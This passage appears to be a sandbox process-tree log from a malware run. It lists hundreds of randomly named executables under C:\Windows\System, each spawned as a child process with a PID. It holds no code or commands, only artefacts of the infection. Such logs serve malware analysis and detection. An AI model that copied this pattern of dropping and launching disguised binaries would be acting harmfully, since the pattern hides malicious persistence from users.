C:\Windows\System\mViEygD.exe
2⤵
PID:8168

C:\Windows\System\jTGYzEE.exe
C:\Windows\System\jTGYzEE.exe
2⤵
PID:7112

C:\Windows\System\czWyYND.exe
C:\Windows\System\czWyYND.exe
2⤵
PID:5132

C:\Windows\System\dpVDfUv.exe
C:\Windows\System\dpVDfUv.exe
2⤵
PID:5680

C:\Windows\System\IbHztwP.exe
C:\Windows\System\IbHztwP.exe
2⤵
PID:6704

C:\Windows\System\UOVpjBl.exe
C:\Windows\System\UOVpjBl.exe
2⤵
PID:6772

C:\Windows\System\NPrLrBU.exe
C:\Windows\System\NPrLrBU.exe
2⤵
PID:5284

C:\Windows\System\QFxkHeI.exe
C:\Windows\System\QFxkHeI.exe
2⤵
PID:5412

C:\Windows\System\DDjCzcN.exe
C:\Windows\System\DDjCzcN.exe
2⤵
PID:6292

C:\Windows\System\lpIlYKV.exe
C:\Windows\System\lpIlYKV.exe
2⤵
PID:6396

C:\Windows\System\xsouSAY.exe
C:\Windows\System\xsouSAY.exe
2⤵
PID:6340

C:\Windows\System\jxZNmwf.exe
C:\Windows\System\jxZNmwf.exe
2⤵
PID:7008

C:\Windows\System\BTtCTgW.exe
C:\Windows\System\BTtCTgW.exe
2⤵
PID:7060

C:\Windows\System\pxrXdTX.exe
C:\Windows\System\pxrXdTX.exe
2⤵
PID:6552

C:\Windows\System\cPXGJrw.exe
C:\Windows\System\cPXGJrw.exe
2⤵
PID:7336

C:\Windows\System\ZqWqDwO.exe
C:\Windows\System\ZqWqDwO.exe
2⤵
PID:7144

C:\Windows\System\PUywELj.exe
C:\Windows\System\PUywELj.exe
2⤵
PID:2632

C:\Windows\System\CLoIwEQ.exe
C:\Windows\System\CLoIwEQ.exe
2⤵
PID:7500

C:\Windows\System\FfuBEPv.exe
C:\Windows\System\FfuBEPv.exe
2⤵
PID:6728

C:\Windows\System\iVUXQrx.exe
C:\Windows\System\iVUXQrx.exe
2⤵
PID:5912

C:\Windows\System\hCyzqpE.exe
C:\Windows\System\hCyzqpE.exe
2⤵
PID:7596

C:\Windows\System\UZEGLqz.exe
C:\Windows\System\UZEGLqz.exe
2⤵
PID:7664

C:\Windows\System\oKRDuoT.exe
C:\Windows\System\oKRDuoT.exe
2⤵
PID:7716

C:\Windows\System\LOcVMnI.exe
C:\Windows\System\LOcVMnI.exe
2⤵
PID:7732

C:\Windows\System\xLbaQuO.exe
C:\Windows\System\xLbaQuO.exe
2⤵
PID:7788

C:\Windows\System\GfwOnYk.exe
C:\Windows\System\GfwOnYk.exe
2⤵
PID:7820

C:\Windows\System\cOsOHBV.exe
C:\Windows\System\cOsOHBV.exe
2⤵
PID:5036

C:\Windows\System\LXGVKFA.exe
C:\Windows\System\LXGVKFA.exe
2⤵
PID:7952

C:\Windows\System\ROWvVOg.exe
C:\Windows\System\ROWvVOg.exe
2⤵
PID:8020

C:\Windows\System\lHTEksb.exe
C:\Windows\System\lHTEksb.exe
2⤵
PID:8200

C:\Windows\System\XnmKsdR.exe
C:\Windows\System\XnmKsdR.exe
2⤵
PID:8232

C:\Windows\System\LXTAfwg.exe
C:\Windows\System\LXTAfwg.exe
2⤵
PID:8256

C:\Windows\System\asVqubL.exe
C:\Windows\System\asVqubL.exe
2⤵
PID:8276

C:\Windows\System\lBvWtQX.exe
C:\Windows\System\lBvWtQX.exe
2⤵
PID:8296

C:\Windows\System\mJEvizr.exe
C:\Windows\System\mJEvizr.exe
2⤵
PID:8316

C:\Windows\System\XzPrkvn.exe
C:\Windows\System\XzPrkvn.exe
2⤵
PID:8340

C:\Windows\System\HTAvTRx.exe
C:\Windows\System\HTAvTRx.exe
2⤵
PID:8360

C:\Windows\System\haRlLdQ.exe
C:\Windows\System\haRlLdQ.exe
2⤵
PID:8380

C:\Windows\System\pCkDgPr.exe
C:\Windows\System\pCkDgPr.exe
2⤵
PID:8404

C:\Windows\System\RmOyPoA.exe
C:\Windows\System\RmOyPoA.exe
2⤵
PID:8428

C:\Windows\System\XbVhrsm.exe
C:\Windows\System\XbVhrsm.exe
2⤵
PID:8448

C:\Windows\System\ZmBtull.exe
C:\Windows\System\ZmBtull.exe
2⤵
PID:8468

C:\Windows\System\mNHpXRh.exe
C:\Windows\System\mNHpXRh.exe
2⤵
PID:8500

C:\Windows\System\FZtqWlZ.exe
C:\Windows\System\FZtqWlZ.exe
2⤵
PID:8524

C:\Windows\System\hyLGcgC.exe
C:\Windows\System\hyLGcgC.exe
2⤵
PID:8544

C:\Windows\System\qVbwiyX.exe
C:\Windows\System\qVbwiyX.exe
2⤵
PID:8564

C:\Windows\System\XroYRez.exe
C:\Windows\System\XroYRez.exe
2⤵
PID:8588

C:\Windows\System\DrfzYks.exe
C:\Windows\System\DrfzYks.exe
2⤵
PID:8616

C:\Windows\System\FFIpPRe.exe
C:\Windows\System\FFIpPRe.exe
2⤵
PID:8636

C:\Windows\System\mxMSmdt.exe
C:\Windows\System\mxMSmdt.exe
2⤵
PID:8664

C:\Windows\System\dskftJN.exe
C:\Windows\System\dskftJN.exe
2⤵
PID:8680

C:\Windows\System\zPlyuGL.exe
C:\Windows\System\zPlyuGL.exe
2⤵
PID:8700

C:\Windows\System\CsDQifr.exe
C:\Windows\System\CsDQifr.exe
2⤵
PID:8724

C:\Windows\System\MGmZfbL.exe
C:\Windows\System\MGmZfbL.exe
2⤵
PID:8744

C:\Windows\System\oTGtVZN.exe
C:\Windows\System\oTGtVZN.exe
2⤵
PID:8768

C:\Windows\System\UoLWdOC.exe
C:\Windows\System\UoLWdOC.exe
2⤵
PID:8792

C:\Windows\System\qHEfutV.exe
C:\Windows\System\qHEfutV.exe
2⤵
PID:8812

C:\Windows\System\neoXtdt.exe
C:\Windows\System\neoXtdt.exe
2⤵
PID:8840

C:\Windows\System\NvlCuxR.exe
C:\Windows\System\NvlCuxR.exe
2⤵
PID:8864

C:\Windows\System\SuEKBWK.exe
C:\Windows\System\SuEKBWK.exe
2⤵
PID:8884

C:\Windows\System\YNPbGyp.exe
C:\Windows\System\YNPbGyp.exe
2⤵
PID:8904

C:\Windows\System\vfqemfS.exe
C:\Windows\System\vfqemfS.exe
2⤵
PID:8928

C:\Windows\System\jzJVeSs.exe
C:\Windows\System\jzJVeSs.exe
2⤵
PID:8948

C:\Windows\System\RoDpKcL.exe
C:\Windows\System\RoDpKcL.exe
2⤵
PID:8972

C:\Windows\System\pXCXrcA.exe
C:\Windows\System\pXCXrcA.exe
2⤵
PID:8996

C:\Windows\System\WXoQaJB.exe
C:\Windows\System\WXoQaJB.exe
2⤵
PID:9016

C:\Windows\System\NCfqvBy.exe
C:\Windows\System\NCfqvBy.exe
2⤵
PID:9040

C:\Windows\System\kVRCYaE.exe
C:\Windows\System\kVRCYaE.exe
2⤵
PID:9064

C:\Windows\System\wpdUxQA.exe
C:\Windows\System\wpdUxQA.exe
2⤵
PID:9092

C:\Windows\System\dSsGnio.exe
C:\Windows\System\dSsGnio.exe
2⤵
PID:9112

C:\Windows\System\eazlKLf.exe
C:\Windows\System\eazlKLf.exe
2⤵
PID:9140

C:\Windows\System\nOFTCxk.exe
C:\Windows\System\nOFTCxk.exe
2⤵
PID:9160

C:\Windows\System\waJWzOz.exe
C:\Windows\System\waJWzOz.exe
2⤵
PID:9184

C:\Windows\System\nmCziDD.exe
C:\Windows\System\nmCziDD.exe
2⤵
PID:9204

C:\Windows\System\RLLvNSI.exe
C:\Windows\System\RLLvNSI.exe
2⤵
PID:8108

C:\Windows\System\adqPIHZ.exe
C:\Windows\System\adqPIHZ.exe
2⤵
PID:6992

C:\Windows\System\dFlpIcF.exe
C:\Windows\System\dFlpIcF.exe
2⤵
PID:6996

C:\Windows\System\csNDikA.exe
C:\Windows\System\csNDikA.exe
2⤵
PID:7212

C:\Windows\System\WVFpaFD.exe
C:\Windows\System\WVFpaFD.exe
2⤵
PID:7272

C:\Windows\System\LhReuQd.exe
C:\Windows\System\LhReuQd.exe
2⤵
PID:5972

C:\Windows\System\vsUNFCV.exe
C:\Windows\System\vsUNFCV.exe
2⤵
PID:7380

C:\Windows\System\ASBikgD.exe
C:\Windows\System\ASBikgD.exe
2⤵
PID:7448

C:\Windows\System\zlZkbgl.exe
C:\Windows\System\zlZkbgl.exe
2⤵
PID:6460

C:\Windows\System\ORXqrFJ.exe
C:\Windows\System\ORXqrFJ.exe
2⤵
PID:1516

C:\Windows\System\RsoQgZs.exe
C:\Windows\System\RsoQgZs.exe
2⤵
PID:6232

C:\Windows\System\eVsezzu.exe
C:\Windows\System\eVsezzu.exe
2⤵
PID:7632

C:\Windows\System\twEXjun.exe
C:\Windows\System\twEXjun.exe
2⤵
PID:7760

C:\Windows\System\XGNabyx.exe
C:\Windows\System\XGNabyx.exe
2⤵
PID:8044

C:\Windows\System\ixJgrvv.exe
C:\Windows\System\ixJgrvv.exe
2⤵
PID:8072

C:\Windows\System\GRdAfnW.exe
C:\Windows\System\GRdAfnW.exe
2⤵
PID:8272

C:\Windows\System\uSCOTXv.exe
C:\Windows\System\uSCOTXv.exe
2⤵
PID:8332

C:\Windows\System\rAYLMuO.exe
C:\Windows\System\rAYLMuO.exe
2⤵
PID:8400

C:\Windows\System\gOagQNE.exe
C:\Windows\System\gOagQNE.exe
2⤵
PID:8496

C:\Windows\System\xwmtbbA.exe
C:\Windows\System\xwmtbbA.exe
2⤵
PID:9224

C:\Windows\System\dJxsbLP.exe
C:\Windows\System\dJxsbLP.exe
2⤵
PID:9252

C:\Windows\System\sOlrbFE.exe
C:\Windows\System\sOlrbFE.exe
2⤵
PID:9272

C:\Windows\System\iCKfdZW.exe
C:\Windows\System\iCKfdZW.exe
2⤵
PID:9292

C:\Windows\System\MhhpVqW.exe
C:\Windows\System\MhhpVqW.exe
2⤵
PID:9316

C:\Windows\System\gpiTvCQ.exe
C:\Windows\System\gpiTvCQ.exe
2⤵
PID:9336

C:\Windows\System\wFxfFMc.exe
C:\Windows\System\wFxfFMc.exe
2⤵
PID:9364

C:\Windows\System\GkkBGAK.exe
C:\Windows\System\GkkBGAK.exe
2⤵
PID:9384

C:\Windows\System\rrGOFcJ.exe
C:\Windows\System\rrGOFcJ.exe
2⤵
PID:9404

C:\Windows\System\GsATYiz.exe
C:\Windows\System\GsATYiz.exe
2⤵
PID:9428

C:\Windows\System\hpjZfYT.exe
C:\Windows\System\hpjZfYT.exe
2⤵
PID:9448

C:\Windows\System\HpnSXJU.exe
C:\Windows\System\HpnSXJU.exe
2⤵
PID:9472

C:\Windows\System\AEuvoBK.exe
C:\Windows\System\AEuvoBK.exe
2⤵
PID:9500

C:\Windows\System\BreXOPS.exe
C:\Windows\System\BreXOPS.exe
2⤵
PID:9520

C:\Windows\System\MufGJtF.exe
C:\Windows\System\MufGJtF.exe
2⤵
PID:9544

C:\Windows\System\VjUHGAX.exe
C:\Windows\System\VjUHGAX.exe
2⤵
PID:9568

C:\Windows\System\cXEheOh.exe
C:\Windows\System\cXEheOh.exe
2⤵
PID:9588

C:\Windows\System\fmKrwqm.exe
C:\Windows\System\fmKrwqm.exe
2⤵
PID:9612

C:\Windows\System\dNtsTEX.exe
C:\Windows\System\dNtsTEX.exe
2⤵
PID:9644

C:\Windows\System\qnMmuTy.exe
C:\Windows\System\qnMmuTy.exe
2⤵
PID:9660

C:\Windows\System\wVhXzuu.exe
C:\Windows\System\wVhXzuu.exe
2⤵
PID:9684

C:\Windows\System\RLgJmry.exe
C:\Windows\System\RLgJmry.exe
2⤵
PID:9704

C:\Windows\System\pozhELn.exe
C:\Windows\System\pozhELn.exe
2⤵
PID:9720

C:\Windows\System\IUkyfWn.exe
C:\Windows\System\IUkyfWn.exe
2⤵
PID:9736

C:\Windows\System\fSwsVud.exe
C:\Windows\System\fSwsVud.exe
2⤵
PID:9764

C:\Windows\System\JwefDfb.exe
C:\Windows\System\JwefDfb.exe
2⤵
PID:9788

C:\Windows\System\FZGvemh.exe
C:\Windows\System\FZGvemh.exe
2⤵
PID:9812

C:\Windows\System\SETmuys.exe
C:\Windows\System\SETmuys.exe
2⤵
PID:9836

C:\Windows\System\tKwqUvf.exe
C:\Windows\System\tKwqUvf.exe
2⤵
PID:9856

C:\Windows\System\aOrHKPH.exe
C:\Windows\System\aOrHKPH.exe
2⤵
PID:9880

C:\Windows\System\acDyPQm.exe
C:\Windows\System\acDyPQm.exe
2⤵
PID:9904

C:\Windows\System\PdDeymg.exe
C:\Windows\System\PdDeymg.exe
2⤵
PID:9936

C:\Windows\System\SjZNWiX.exe
C:\Windows\System\SjZNWiX.exe
2⤵
PID:7656

C:\Windows\System\DDKvkaS.exe
C:\Windows\System\DDKvkaS.exe
2⤵
PID:7556

C:\Windows\System\VSQGWhA.exe
C:\Windows\System\VSQGWhA.exe
2⤵
PID:7860

C:\Windows\System\iedoszu.exe
C:\Windows\System\iedoszu.exe
2⤵
PID:7988

C:\Windows\System\pLvdrzB.exe
C:\Windows\System\pLvdrzB.exe
2⤵
PID:8208

C:\Windows\System\cuOhviZ.exe
C:\Windows\System\cuOhviZ.exe
2⤵
PID:8308

C:\Windows\System\rRJyDhJ.exe
C:\Windows\System\rRJyDhJ.exe
2⤵
PID:4132

C:\Windows\System\ILMizlM.exe
C:\Windows\System\ILMizlM.exe
2⤵
PID:8424

C:\Windows\System\bwGekLE.exe
C:\Windows\System\bwGekLE.exe
2⤵
PID:7152

C:\Windows\System\wUcPCTM.exe
C:\Windows\System\wUcPCTM.exe
2⤵
PID:2992

C:\Windows\System\IFDownd.exe
C:\Windows\System\IFDownd.exe
2⤵
PID:9220

C:\Windows\System\fgapEAW.exe
C:\Windows\System\fgapEAW.exe
2⤵
PID:7048

C:\Windows\System\VyqJUxj.exe
C:\Windows\System\VyqJUxj.exe
2⤵
PID:8760

C:\Windows\System\njeeorZ.exe
C:\Windows\System\njeeorZ.exe
2⤵
PID:8852

C:\Windows\System\RqUhMQH.exe
C:\Windows\System\RqUhMQH.exe
2⤵
PID:9824

C:\Windows\System\GiWAncn.exe
C:\Windows\System\GiWAncn.exe
2⤵
PID:7580

C:\Windows\System\iFCOeIS.exe
C:\Windows\System\iFCOeIS.exe
2⤵
PID:7692

C:\Windows\System\rjBgQwf.exe
C:\Windows\System\rjBgQwf.exe
2⤵
PID:6188

C:\Windows\System\EtwZdwR.exe
C:\Windows\System\EtwZdwR.exe
2⤵
PID:7900

C:\Windows\System\evZNqOn.exe
C:\Windows\System\evZNqOn.exe
2⤵
PID:8196

C:\Windows\System\mRDVTGh.exe
C:\Windows\System\mRDVTGh.exe
2⤵
PID:6960

C:\Windows\System\oNeuyER.exe
C:\Windows\System\oNeuyER.exe
2⤵
PID:8284

C:\Windows\System\ZxsdBKx.exe
C:\Windows\System\ZxsdBKx.exe
2⤵
PID:7104

C:\Windows\System\GSHZsrT.exe
C:\Windows\System\GSHZsrT.exe
2⤵
PID:7012

C:\Windows\System\uGQcDAm.exe
C:\Windows\System\uGQcDAm.exe
2⤵
PID:7972

C:\Windows\System\VJFDFRy.exe
C:\Windows\System\VJFDFRy.exe
2⤵
PID:10244

C:\Windows\System\CJKnhMC.exe
C:\Windows\System\CJKnhMC.exe
2⤵
PID:10260

C:\Windows\System\CYUQefy.exe
C:\Windows\System\CYUQefy.exe
2⤵
PID:10288

C:\Windows\System\hLjIsoX.exe
C:\Windows\System\hLjIsoX.exe
2⤵
PID:10304

C:\Windows\System\efPtIxp.exe
C:\Windows\System\efPtIxp.exe
2⤵
PID:10328

C:\Windows\System\rFsmUcn.exe
C:\Windows\System\rFsmUcn.exe
2⤵
PID:10344

C:\Windows\System\AiitgpI.exe
C:\Windows\System\AiitgpI.exe
2⤵
PID:10364

C:\Windows\System\PjbtGTl.exe
C:\Windows\System\PjbtGTl.exe
2⤵
PID:10380

C:\Windows\System\WGFrwfB.exe
C:\Windows\System\WGFrwfB.exe
2⤵
PID:10396

C:\Windows\System\znOmDKa.exe
C:\Windows\System\znOmDKa.exe
2⤵
PID:10412

C:\Windows\System\oSTAMqH.exe
C:\Windows\System\oSTAMqH.exe
2⤵
PID:10428

C:\Windows\System\LttAHFf.exe
C:\Windows\System\LttAHFf.exe
2⤵
PID:10456

C:\Windows\System\RCUlFka.exe
C:\Windows\System\RCUlFka.exe
2⤵
PID:10480

C:\Windows\System\OvQvbKA.exe
C:\Windows\System\OvQvbKA.exe
2⤵
PID:10504

C:\Windows\System\gPVgTIi.exe
C:\Windows\System\gPVgTIi.exe
2⤵
PID:10524

C:\Windows\System\eeBhrbA.exe
C:\Windows\System\eeBhrbA.exe
2⤵
PID:10548

C:\Windows\System\DuiMmqC.exe
C:\Windows\System\DuiMmqC.exe
2⤵
PID:10568

C:\Windows\System\bkYqosT.exe
C:\Windows\System\bkYqosT.exe
2⤵
PID:10592

C:\Windows\System\hBYScPU.exe
C:\Windows\System\hBYScPU.exe
2⤵
PID:10612

C:\Windows\System\QSFxkKq.exe
C:\Windows\System\QSFxkKq.exe
2⤵
PID:10632

C:\Windows\System\KvYvmDs.exe
C:\Windows\System\KvYvmDs.exe
2⤵
PID:10652

C:\Windows\System\XOinCzc.exe
C:\Windows\System\XOinCzc.exe
2⤵
PID:10676

C:\Windows\System\qoVcCuG.exe
C:\Windows\System\qoVcCuG.exe
2⤵
PID:10700

C:\Windows\System\VLFBuqk.exe
C:\Windows\System\VLFBuqk.exe
2⤵
PID:10720

C:\Windows\System\zyMHiQZ.exe
C:\Windows\System\zyMHiQZ.exe
2⤵
PID:10744

C:\Windows\System\QEzZzzU.exe
C:\Windows\System\QEzZzzU.exe
2⤵
PID:10764

C:\Windows\System\uGmxlUf.exe
C:\Windows\System\uGmxlUf.exe
2⤵
PID:10784

C:\Windows\System\aYgUvgN.exe
C:\Windows\System\aYgUvgN.exe
2⤵
PID:10804

C:\Windows\System\PrrezFg.exe
C:\Windows\System\PrrezFg.exe
2⤵
PID:10824

C:\Windows\System\SmylFeK.exe
C:\Windows\System\SmylFeK.exe
2⤵
PID:10844

C:\Windows\System\afJreHZ.exe
C:\Windows\System\afJreHZ.exe
2⤵
PID:10864

C:\Windows\System\AEZeYpT.exe
C:\Windows\System\AEZeYpT.exe
2⤵
PID:10888

C:\Windows\System\RRXmejc.exe
C:\Windows\System\RRXmejc.exe
2⤵
PID:10912

C:\Windows\System\dloiuat.exe
C:\Windows\System\dloiuat.exe
2⤵
PID:10940

C:\Windows\System\hOkvxWr.exe
C:\Windows\System\hOkvxWr.exe
2⤵
PID:10960

C:\Windows\System\jtsypKM.exe
C:\Windows\System\jtsypKM.exe
2⤵
PID:10984

C:\Windows\System\yeQLjpS.exe
C:\Windows\System\yeQLjpS.exe
2⤵
PID:11000

C:\Windows\System\GRzfMDx.exe
C:\Windows\System\GRzfMDx.exe
2⤵
PID:11016

C:\Windows\System\rpMKoTp.exe
C:\Windows\System\rpMKoTp.exe
2⤵
PID:11036

C:\Windows\System\vBWiltF.exe
C:\Windows\System\vBWiltF.exe
2⤵
PID:11064

C:\Windows\System\TOJWMFI.exe
C:\Windows\System\TOJWMFI.exe
2⤵
PID:11088

C:\Windows\System\PWZaiFy.exe
C:\Windows\System\PWZaiFy.exe
2⤵
PID:11108

C:\Windows\System\JiAsRCZ.exe
C:\Windows\System\JiAsRCZ.exe
2⤵
PID:11128

C:\Windows\System\prbCGLh.exe
C:\Windows\System\prbCGLh.exe
2⤵
PID:11152

C:\Windows\System\mMdXKWJ.exe
C:\Windows\System\mMdXKWJ.exe
2⤵
PID:11180

C:\Windows\System\vErLYLU.exe
C:\Windows\System\vErLYLU.exe
2⤵
PID:11232

C:\Windows\System\JYoVegk.exe
C:\Windows\System\JYoVegk.exe
2⤵
PID:8536

C:\Windows\System\EIDgwkZ.exe
C:\Windows\System\EIDgwkZ.exe
2⤵
PID:9332

C:\Windows\System\NqrCCEV.exe
C:\Windows\System\NqrCCEV.exe
2⤵
PID:8672

C:\Windows\System\LGdBjZr.exe
C:\Windows\System\LGdBjZr.exe
2⤵
PID:9480

C:\Windows\System\siHGQZf.exe
C:\Windows\System\siHGQZf.exe
2⤵
PID:9528

C:\Windows\System\fZrsrVG.exe
C:\Windows\System\fZrsrVG.exe
2⤵
PID:9576

C:\Windows\System\nqHMzAj.exe
C:\Windows\System\nqHMzAj.exe
2⤵
PID:8820

C:\Windows\System\BiMszCT.exe
C:\Windows\System\BiMszCT.exe
2⤵
PID:8856

C:\Windows\System\WTRfoTA.exe
C:\Windows\System\WTRfoTA.exe
2⤵
PID:8900

C:\Windows\System\uUuvbkW.exe
C:\Windows\System\uUuvbkW.exe
2⤵
PID:10184

C:\Windows\System\hkOctdd.exe
C:\Windows\System\hkOctdd.exe
2⤵
PID:8944

C:\Windows\System\ObBjoXa.exe
C:\Windows\System\ObBjoXa.exe
2⤵
PID:10208

C:\Windows\System\TXtfzlW.exe
C:\Windows\System\TXtfzlW.exe
2⤵
PID:9652

C:\Windows\System\coLhLFe.exe
C:\Windows\System\coLhLFe.exe
2⤵
PID:7756

C:\Windows\System\ParWGYZ.exe
C:\Windows\System\ParWGYZ.exe
2⤵
PID:6528

C:\Windows\System\wIOltTP.exe
C:\Windows\System\wIOltTP.exe
2⤵
PID:7520

C:\Windows\System\SQrvamt.exe
C:\Windows\System\SQrvamt.exe
2⤵
PID:7712

C:\Windows\System\YdbBPJQ.exe
C:\Windows\System\YdbBPJQ.exe
2⤵
PID:9156

C:\Windows\System\Ceitiuo.exe
C:\Windows\System\Ceitiuo.exe
2⤵
PID:6508

C:\Windows\System\WBdGYFR.exe
C:\Windows\System\WBdGYFR.exe
2⤵
PID:6792

C:\Windows\System\gJFbqUe.exe
C:\Windows\System\gJFbqUe.exe
2⤵
PID:7268

C:\Windows\System\dZeEkSg.exe
C:\Windows\System\dZeEkSg.exe
2⤵
PID:8968

C:\Windows\System\NmAOInx.exe
C:\Windows\System\NmAOInx.exe
2⤵
PID:6172

C:\Windows\System\TWRduEY.exe
C:\Windows\System\TWRduEY.exe
2⤵
PID:11268

C:\Windows\System\AyoTfDP.exe
C:\Windows\System\AyoTfDP.exe
2⤵
PID:11284

C:\Windows\System\jAwECCI.exe
C:\Windows\System\jAwECCI.exe
2⤵
PID:11300

C:\Windows\System\MDOybga.exe
C:\Windows\System\MDOybga.exe
2⤵
PID:11324

C:\Windows\System\ElDrjGQ.exe
C:\Windows\System\ElDrjGQ.exe
2⤵
PID:11352

C:\Windows\System\wHProrB.exe
C:\Windows\System\wHProrB.exe
2⤵
PID:11376

C:\Windows\System\iJVwIyk.exe
C:\Windows\System\iJVwIyk.exe
2⤵
PID:11408

C:\Windows\System\AlYeSqd.exe
C:\Windows\System\AlYeSqd.exe
2⤵
PID:11428

C:\Windows\System\jYNZrqP.exe
C:\Windows\System\jYNZrqP.exe
2⤵
PID:11464

C:\Windows\System\yPXvqmR.exe
C:\Windows\System\yPXvqmR.exe
2⤵
PID:11480

C:\Windows\System\AKMXNCj.exe
C:\Windows\System\AKMXNCj.exe
2⤵
PID:11496

C:\Windows\System\hIJmyMs.exe
C:\Windows\System\hIJmyMs.exe
2⤵
PID:11516

C:\Windows\System\HuHVgAz.exe
C:\Windows\System\HuHVgAz.exe
2⤵
PID:11540

C:\Windows\System\lvEdwEW.exe
C:\Windows\System\lvEdwEW.exe
2⤵
PID:11560

C:\Windows\System\MvoIbpZ.exe
C:\Windows\System\MvoIbpZ.exe
2⤵
PID:11584

C:\Windows\System\ZMJKtcT.exe
C:\Windows\System\ZMJKtcT.exe
2⤵
PID:11600

C:\Windows\System\yyicCKC.exe
C:\Windows\System\yyicCKC.exe
2⤵
PID:11628

C:\Windows\System\aJMWdht.exe
C:\Windows\System\aJMWdht.exe
2⤵
PID:11656

C:\Windows\System\UoZXfeM.exe
C:\Windows\System\UoZXfeM.exe
2⤵
PID:11676

C:\Windows\System\KlXLVQj.exe
C:\Windows\System\KlXLVQj.exe
2⤵
PID:11704

C:\Windows\System\OdAPOHl.exe
C:\Windows\System\OdAPOHl.exe
2⤵
PID:11724

C:\Windows\System\IrgbEZF.exe
C:\Windows\System\IrgbEZF.exe
2⤵
PID:11752

C:\Windows\System\wusOkcs.exe
C:\Windows\System\wusOkcs.exe
2⤵
PID:11772

C:\Windows\System\vxxOBHg.exe
C:\Windows\System\vxxOBHg.exe
2⤵
PID:11796

C:\Windows\System\gzTVIGc.exe
C:\Windows\System\gzTVIGc.exe
2⤵
PID:11828

C:\Windows\System\FHQWkVf.exe
C:\Windows\System\FHQWkVf.exe
2⤵
PID:11860

C:\Windows\System\UshGOMr.exe
C:\Windows\System\UshGOMr.exe
2⤵
PID:11880

C:\Windows\System\mKuOklc.exe
C:\Windows\System\mKuOklc.exe
2⤵
PID:11900

C:\Windows\System\yJlNbVi.exe
C:\Windows\System\yJlNbVi.exe
2⤵
PID:11920

C:\Windows\System\eCRUxSb.exe
C:\Windows\System\eCRUxSb.exe
2⤵
PID:11948

C:\Windows\System\pxaCDwA.exe
C:\Windows\System\pxaCDwA.exe
2⤵
PID:11976

C:\Windows\System\wTwuXWi.exe
C:\Windows\System\wTwuXWi.exe
2⤵
PID:11996

C:\Windows\System\yWVATLr.exe
C:\Windows\System\yWVATLr.exe
2⤵
PID:12020

C:\Windows\System\ixemEOZ.exe
C:\Windows\System\ixemEOZ.exe
2⤵
PID:12040

C:\Windows\System\TxWaJIh.exe
C:\Windows\System\TxWaJIh.exe
2⤵
PID:12068

C:\Windows\System\jtImiRo.exe
C:\Windows\System\jtImiRo.exe
2⤵
PID:12096

C:\Windows\System\XnoMHRV.exe
C:\Windows\System\XnoMHRV.exe
2⤵
PID:12116

C:\Windows\System\CpJuzxd.exe
C:\Windows\System\CpJuzxd.exe
2⤵
PID:12140

C:\Windows\System\wfkQTdj.exe
C:\Windows\System\wfkQTdj.exe
2⤵
PID:12160

C:\Windows\System\mrjXutz.exe
C:\Windows\System\mrjXutz.exe
2⤵
PID:12176

C:\Windows\System\GzKcgqT.exe
C:\Windows\System\GzKcgqT.exe
2⤵
PID:12200

C:\Windows\System\ViBxcxi.exe
C:\Windows\System\ViBxcxi.exe
2⤵
PID:12220

C:\Windows\System\fNbJIRz.exe
C:\Windows\System\fNbJIRz.exe
2⤵
PID:12236

C:\Windows\System\fEKWHvd.exe
C:\Windows\System\fEKWHvd.exe
2⤵
PID:12256

C:\Windows\System\kcuQZen.exe
C:\Windows\System\kcuQZen.exe
2⤵
PID:12280

C:\Windows\System\YPGiQaR.exe
C:\Windows\System\YPGiQaR.exe
2⤵
PID:8120

C:\Windows\System\hodnkXt.exe
C:\Windows\System\hodnkXt.exe
2⤵
PID:10272

C:\Windows\System\FekgXgP.exe
C:\Windows\System\FekgXgP.exe
2⤵
PID:10372

C:\Windows\System\AlJITKH.exe
C:\Windows\System\AlJITKH.exe
2⤵
PID:10420

C:\Windows\System\PnwsQnI.exe
C:\Windows\System\PnwsQnI.exe
2⤵
PID:10472

C:\Windows\System\LIpmfgG.exe
C:\Windows\System\LIpmfgG.exe
2⤵
PID:10516

C:\Windows\System\TFsJobS.exe
C:\Windows\System\TFsJobS.exe
2⤵
PID:9268

C:\Windows\System\fPFLQWJ.exe
C:\Windows\System\fPFLQWJ.exe
2⤵
PID:10564

C:\Windows\System\eVgMgTf.exe
C:\Windows\System\eVgMgTf.exe
2⤵
PID:9412

C:\Windows\System\nmTxyef.exe
C:\Windows\System\nmTxyef.exe
2⤵
PID:9492

C:\Windows\System\ZRjxlXT.exe
C:\Windows\System\ZRjxlXT.exe
2⤵
PID:10872

C:\Windows\System\UbNFjvA.exe
C:\Windows\System\UbNFjvA.exe
2⤵
PID:10936

C:\Windows\System\SBIyfvr.exe
C:\Windows\System\SBIyfvr.exe
2⤵
PID:10972

C:\Windows\System\cmBZYCy.exe
C:\Windows\System\cmBZYCy.exe
2⤵
PID:11008

C:\Windows\System\KuRTRwS.exe
C:\Windows\System\KuRTRwS.exe
2⤵
PID:9780

C:\Windows\System\ReUbriM.exe
C:\Windows\System\ReUbriM.exe
2⤵
PID:10216

C:\Windows\System\QYJFZHT.exe
C:\Windows\System\QYJFZHT.exe
2⤵
PID:8632

C:\Windows\System\GqDUiGj.exe
C:\Windows\System\GqDUiGj.exe
2⤵
PID:7032

C:\Windows\System\eajikgR.exe
C:\Windows\System\eajikgR.exe
2⤵
PID:8784

C:\Windows\System\vPLZOVn.exe
C:\Windows\System\vPLZOVn.exe
2⤵
PID:9748

C:\Windows\System\fJiaErt.exe
C:\Windows\System\fJiaErt.exe
2⤵
PID:9600

C:\Windows\System\OvYxewg.exe
C:\Windows\System\OvYxewg.exe
2⤵
PID:9440

C:\Windows\System\SgsagDi.exe
C:\Windows\System\SgsagDi.exe
2⤵
PID:9328

C:\Windows\System\PSamoWI.exe
C:\Windows\System\PSamoWI.exe
2⤵
PID:6408

C:\Windows\System\HrqBbML.exe
C:\Windows\System\HrqBbML.exe
2⤵
PID:6748

C:\Windows\System\WsXQaQY.exe
C:\Windows\System\WsXQaQY.exe
2⤵
PID:9668

C:\Windows\System\QJkKgYh.exe
C:\Windows\System\QJkKgYh.exe
2⤵
PID:8696

C:\Windows\System\VRCWSsx.exe
C:\Windows\System\VRCWSsx.exe
2⤵
PID:7360

C:\Windows\System\xyTPfFX.exe
C:\Windows\System\xyTPfFX.exe
2⤵
PID:12292

C:\Windows\System\EINngIQ.exe
C:\Windows\System\EINngIQ.exe
2⤵
PID:12316

C:\Windows\System\jyZsUEu.exe
C:\Windows\System\jyZsUEu.exe
2⤵
PID:12340

C:\Windows\System\JVRwxHl.exe
C:\Windows\System\JVRwxHl.exe
2⤵
PID:12356

C:\Windows\System\kavSdJo.exe
C:\Windows\System\kavSdJo.exe
2⤵
PID:12376

C:\Windows\System\tYdEHxT.exe
C:\Windows\System\tYdEHxT.exe
2⤵
PID:12396

